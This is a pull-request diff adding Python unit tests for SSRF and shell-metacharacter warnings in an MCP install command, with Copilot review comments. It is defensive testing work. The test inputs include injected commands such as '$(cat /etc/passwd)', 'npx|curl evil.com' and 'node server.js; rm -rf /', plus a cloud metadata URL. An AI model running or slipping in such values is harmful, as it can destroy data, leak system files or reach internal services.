Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
304 changes: 304 additions & 0 deletions tests/unit/install/test_mcp_warnings.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,304 @@
"""Unit tests for ``apm_cli.install.mcp_warnings``.

Covers F5 (SSRF) and F7 (shell metacharacter) non-blocking safety warnings
that fire during ``apm install --mcp``.
"""

from __future__ import annotations

import socket
from unittest.mock import MagicMock, patch

import pytest

Comment on lines +9 to +13
Copy link

Copilot AI Apr 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

socket and pytest are imported but unused in this test module. Please remove unused imports to keep the test file minimal and avoid future lint/static-analysis noise.

Suggested change
import socket
from unittest.mock import MagicMock, patch
import pytest
from unittest.mock import MagicMock, patch

Copilot uses AI. Check for mistakes.
from apm_cli.install.mcp_warnings import (
_is_internal_or_metadata_host,
warn_shell_metachars,
warn_ssrf_url,
)


# ================================================================
# _is_internal_or_metadata_host
# ================================================================


class TestIsInternalOrMetadataHost:
"""Tests for the host-classification helper."""

# -- empty / falsy inputs --

def test_empty_string_returns_false(self):
assert _is_internal_or_metadata_host("") is False

# -- loopback addresses --

def test_ipv4_loopback_returns_true(self):
assert _is_internal_or_metadata_host("127.0.0.1") is True

def test_ipv4_loopback_other_returns_true(self):
assert _is_internal_or_metadata_host("127.255.0.1") is True

def test_ipv6_loopback_returns_true(self):
assert _is_internal_or_metadata_host("::1") is True

# -- cloud metadata endpoints --

def test_aws_imds_returns_true(self):
assert _is_internal_or_metadata_host("169.254.169.254") is True

def test_alibaba_cloud_imds_returns_true(self):
assert _is_internal_or_metadata_host("100.100.100.200") is True

def test_aws_ipv6_imds_returns_true(self):
assert _is_internal_or_metadata_host("fd00:ec2::254") is True

# -- link-local --

def test_link_local_ipv4_returns_true(self):
assert _is_internal_or_metadata_host("169.254.1.1") is True

# -- RFC1918 private ranges --

def test_rfc1918_class_a_returns_true(self):
assert _is_internal_or_metadata_host("10.0.0.1") is True

def test_rfc1918_class_b_returns_true(self):
assert _is_internal_or_metadata_host("172.16.0.1") is True

def test_rfc1918_class_c_returns_true(self):
assert _is_internal_or_metadata_host("192.168.1.100") is True

# -- IPv6 brackets (literal URL host) --

def test_ipv6_loopback_bracketed_returns_true(self):
assert _is_internal_or_metadata_host("[::1]") is True

def test_ipv6_private_bracketed_returns_true(self):
assert _is_internal_or_metadata_host("[fc00::1]") is True

# -- public / external addresses (should return False) --

def test_public_ipv4_returns_false(self):
assert _is_internal_or_metadata_host("8.8.8.8") is False

def test_public_ipv4_other_returns_false(self):
assert _is_internal_or_metadata_host("1.1.1.1") is False

# -- hostname resolution --

def test_hostname_resolves_to_loopback_returns_true(self):
with patch("socket.gethostbyname", return_value="127.0.0.1"):
assert _is_internal_or_metadata_host("my-internal-host") is True

def test_hostname_resolves_to_public_returns_false(self):
with patch("socket.gethostbyname", return_value="93.184.216.34"):
assert _is_internal_or_metadata_host("example.com") is False

def test_hostname_resolution_failure_returns_false(self):
with patch("socket.gethostbyname", side_effect=OSError("no route")):
assert _is_internal_or_metadata_host("unresolvable.local") is False

def test_hostname_unicode_error_returns_false(self):
with patch("socket.gethostbyname", side_effect=UnicodeError):
assert _is_internal_or_metadata_host("bad\x00host") is False


# ================================================================
# warn_ssrf_url (F5)
# ================================================================


class TestWarnSsrfUrl:
"""Tests for the SSRF URL warning helper."""

def _make_logger(self):
return MagicMock()

def test_none_url_does_not_warn(self):
logger = self._make_logger()
warn_ssrf_url(None, logger)
logger.warning.assert_not_called()

def test_empty_url_does_not_warn(self):
logger = self._make_logger()
warn_ssrf_url("", logger)
logger.warning.assert_not_called()

def test_internal_url_warns(self):
logger = self._make_logger()
warn_ssrf_url("http://127.0.0.1:8080/api", logger)
logger.warning.assert_called_once()
msg = logger.warning.call_args[0][0]
assert "127.0.0.1" in msg

Comment on lines +128 to +134
Copy link

Copilot AI Apr 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Avoid substring-matching a URL/host inside the warning text (assert "127.0.0.1" in msg). Our test convention (and CodeQL py/incomplete-url-substring-sanitization) requires parsing the URL from the message (e.g., extract the quoted URL and compare urlparse(...).hostname) or asserting the full expected message shape in a way that doesn't use in against URL-like data.

Copilot generated this review using guidance from repository custom instructions.
def test_metadata_url_warns(self):
logger = self._make_logger()
warn_ssrf_url("http://169.254.169.254/latest/meta-data", logger)
logger.warning.assert_called_once()

def test_private_range_url_warns(self):
logger = self._make_logger()
warn_ssrf_url("https://192.168.0.1/mcp", logger)
logger.warning.assert_called_once()

def test_public_url_does_not_warn(self):
logger = self._make_logger()
warn_ssrf_url("https://mcp.example.com/v1", logger)
logger.warning.assert_not_called()

def test_malformed_url_does_not_crash(self):
logger = self._make_logger()
# Should swallow ValueError/TypeError gracefully
warn_ssrf_url("not-a-url", logger)
# May or may not warn; must not raise

def test_url_with_no_hostname_does_not_crash(self):
logger = self._make_logger()
warn_ssrf_url("file:///etc/passwd", logger)
# file:// has no hostname; must not raise

def test_hostname_resolves_to_private_warns(self):
logger = self._make_logger()
with patch("socket.gethostbyname", return_value="10.0.0.1"):
warn_ssrf_url("http://internal-host/endpoint", logger)
logger.warning.assert_called_once()


# ================================================================
# warn_shell_metachars (F7)
# ================================================================


class TestWarnShellMetachars:
"""Tests for the shell metacharacter warning helper."""

def _make_logger(self):
return MagicMock()

# -- no-op paths --

def test_none_env_and_no_command_does_nothing(self):
logger = self._make_logger()
warn_shell_metachars(None, logger)
logger.warning.assert_not_called()

def test_empty_env_and_no_command_does_nothing(self):
logger = self._make_logger()
warn_shell_metachars({}, logger)
logger.warning.assert_not_called()

def test_clean_env_does_not_warn(self):
logger = self._make_logger()
warn_shell_metachars({"MY_TOKEN": "abc123", "PORT": "3000"}, logger)
logger.warning.assert_not_called()

def test_clean_command_does_not_warn(self):
logger = self._make_logger()
warn_shell_metachars(None, logger, command="npx -y @modelcontextprotocol/server")
logger.warning.assert_not_called()

# -- env value metacharacters --

def test_dollar_paren_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"SECRET": "$(cat /etc/passwd)"}, logger)
logger.warning.assert_called_once()
msg = logger.warning.call_args[0][0]
assert "SECRET" in msg

def test_backtick_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"VAL": "`id`"}, logger)
logger.warning.assert_called_once()

def test_semicolon_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"CMD": "foo; bar"}, logger)
logger.warning.assert_called_once()

def test_double_ampersand_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"RUN": "true && bad"}, logger)
logger.warning.assert_called_once()

def test_double_pipe_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"FALLBACK": "a || b"}, logger)
logger.warning.assert_called_once()

def test_pipe_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"PIPE": "cmd | grep x"}, logger)
logger.warning.assert_called_once()

def test_redirect_append_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"OUT": "cmd >> /tmp/log"}, logger)
logger.warning.assert_called_once()

def test_redirect_write_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"OUT": "cmd > /tmp/out"}, logger)
logger.warning.assert_called_once()

def test_redirect_read_in_env_warns(self):
logger = self._make_logger()
warn_shell_metachars({"IN": "cmd < input.txt"}, logger)
logger.warning.assert_called_once()

def test_only_first_metachar_triggers_warning_per_key(self):
"""Only one warning is emitted per env key (break after first match)."""
logger = self._make_logger()
warn_shell_metachars({"MULTI": "$(foo) && bar"}, logger)
# Only one call despite multiple metacharacters
assert logger.warning.call_count == 1

def test_multiple_keys_each_warn_independently(self):
"""Each offending env key produces its own warning."""
logger = self._make_logger()
warn_shell_metachars({"K1": "$(a)", "K2": "$(b)"}, logger)
assert logger.warning.call_count == 2

def test_none_value_in_env_does_not_crash(self):
"""None env values are treated as empty strings without error."""
logger = self._make_logger()
warn_shell_metachars({"TOKEN": None}, logger)
logger.warning.assert_not_called()

def test_integer_value_in_env_does_not_crash(self):
"""Non-string env values are coerced to str without error."""
logger = self._make_logger()
warn_shell_metachars({"PORT": 3000}, logger)
logger.warning.assert_not_called()

# -- command field metacharacters --

def test_command_with_pipe_warns(self):
logger = self._make_logger()
warn_shell_metachars(None, logger, command="npx|curl evil.com")
logger.warning.assert_called_once()
msg = logger.warning.call_args[0][0]
assert "command" in msg.lower()

def test_command_with_semicolon_warns(self):
logger = self._make_logger()
warn_shell_metachars(None, logger, command="node server.js; rm -rf /")
logger.warning.assert_called_once()

def test_command_with_subshell_warns(self):
logger = self._make_logger()
warn_shell_metachars(None, logger, command="echo $(secret)")
logger.warning.assert_called_once()

def test_non_string_command_does_not_crash(self):
"""Non-string command (e.g. list) is skipped gracefully."""
logger = self._make_logger()
warn_shell_metachars(None, logger, command=["npx", "server"])
logger.warning.assert_not_called()

def test_env_and_command_both_warn(self):
"""Warnings fire for both env and command when both have metacharacters."""
logger = self._make_logger()
warn_shell_metachars({"K": "$(x)"}, logger, command="cmd; bad")
assert logger.warning.call_count == 2
Loading